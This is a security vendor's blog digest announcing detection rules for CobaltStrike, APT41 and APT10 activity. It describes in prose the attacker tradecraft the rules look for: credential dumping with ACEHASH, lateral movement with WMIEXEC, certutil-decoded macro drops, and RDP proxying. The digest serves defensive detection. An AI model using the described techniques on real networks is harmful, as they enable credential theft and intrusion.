Rule Digest: CobaltStrike, APT10, and APT41

We are pleased to present to you the regular Rule Digest, which consists of rules developed by the SOC Prime Team only. This is a kind of thematic selection since all of these rules help to find malicious activity of APT groups linked to the Chinese government and CobaltStrike tool often used by these groups in cyber espionage campaigns.

But before moving directly to the Rule Digest, we want to draw your attention to a critical vulnerability in Windows DNS Servers, CVE-2020-1350 (aka SIGRed) and threat hunting content to detect its exploitation. You can read our special rule digest dedicated to such content here: https://socprime.com/blog/threat-hunting-rules-to-detect-exploitation-of-cve-2020-1350-sigred/

Possible CobaltStrike PsExec filenames (via audit) rule enables security solutions to quickly identify CobaltStrike psexec behavior based on its predictable pseudo-random service naming scheme. CobaltStrike uses executables with 7 random alphanumeric characters by default (i.e. 28a3fe2.exe). CobaltStrike is often used by APT41 group, but many other threat actors also use this tool, so the community rule will be useful in almost every organization: https://tdm.socprime.com/tdm/info/1aX2L06wVHuN/W6usTnMBQAH5UgbBwjB2/?p=1

Wait for the next digest in a week.

Stay safe!

The following two rules are for detecting APT41 group activity. This group utilizes multiple malware families to maintain access into this environment, and in observed campaigns they used ACEHASH tool in cases when Mimikatz failed. ACEHASH is a credential theft and password dumping utility that combines the functionality of multiple tools such as Mimikatz, hashdump, and Windows Credential Editor. Possible APT41 ACEHASH usage (via cmdline) rule matches on instances of their previous ACEHASH usage as an encrypted module: https://tdm.socprime.com/tdm/info/TZrew9P8Lrpe/XNKzTXMBPeJ4_8xc3wK_/?p=1

APT41 frequently uses the publicly available utility WMIEXEC to move laterally across an environment. WMIEXEC is a tool that allows for the execution of WMI commands on remote machines. Possible APT41 WMIEXEC Usage (via cmdline) rule detects a customized version of WMIEXEC from impacket used by this actor: https://tdm.socprime.com/tdm/info/V9r85CwVjAA8/f6eyTXMBSh4W_EKGPmgA/?p=1

And the last two rules help detect the activity of another Chinese group, APT10 (aka menuPass), in an organization’s network. APT10 is a Chinese cyber espionage group that has been active since 2009. They have historically targeted construction and engineering, aerospace, and telecom firms, and governments in the United States, Europe, and Japan.

In past campaigns, attackers dropped TXT files using malicious macro, and then the same macro decoded the dropped files using Windows certutil.exe and created a copy of the files with their proper extensions using Extensible Storage Engine Utilities (esentutil.exe). Possible menuPass TTP .TXT in base of unusual directories (via cmdline) rule can uncover such activity to stop the attack: https://tdm.socprime.com/tdm/info/8hpD13wdmRiS/zqqwTXMBQAH5UgbBJ5TR/?p=1

And the last rule for today helps to detect when this threat actor uses “proxyconnect” as a tool to proxy RDP. Possible menuPass Hacktool proxyconnect (via cmdline) rule is available here: https://tdm.socprime.com/tdm/info/lIbFaxM8Lwsc/paqxTXMBQAH5UgbBL5Vi/?p=1

The rules have translations for the following platforms:

SIEM: Azure Sentinel, ArcSight, QRadar, Splunk, Graylog, Sumo Logic, ELK Stack, RSA NetWitness, LogPoint, Humio 

EDR: Microsoft Defender ATP, Carbon Black, Elastic Endpoint

MITRE ATT&CK: 

Tactics: Execution, Credential Access, Collection 

Techniques: Service Execution (T1569), Credential Dumping (T1003), PowerShell (T1086), Data Staged (T1074)